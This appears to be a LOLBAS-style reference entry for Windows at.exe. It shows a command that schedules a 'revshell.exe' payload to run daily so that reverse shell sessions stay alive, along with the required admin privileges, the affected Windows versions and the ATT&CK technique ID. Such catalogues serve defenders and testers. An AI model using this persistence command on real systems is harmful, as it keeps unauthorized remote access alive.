.. /At.exe

Star

Schedule periodic tasks

• https://freddiebarrsmith.com/at.txt
• https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_windows.html
• https://www.secureworks.com/blog/where-you-at-indicators-of-lateral-movement-using-at-exe-on-windows-7-systems

Execute

1. Create a recurring task to execute every day at a specific time.

   C:\Windows\System32\at.exe 09:00 /interactive /every:m,t,w,th,f,s,su C:\Windows\System32\revshell.exe

   Use case

   Create a recurring task, to eg. to keep reverse shell session(s) alive

   Privileges required

   Local Admin

   Operating systems

   Windows 7 or older

   ATT&CK® technique

   T1053.002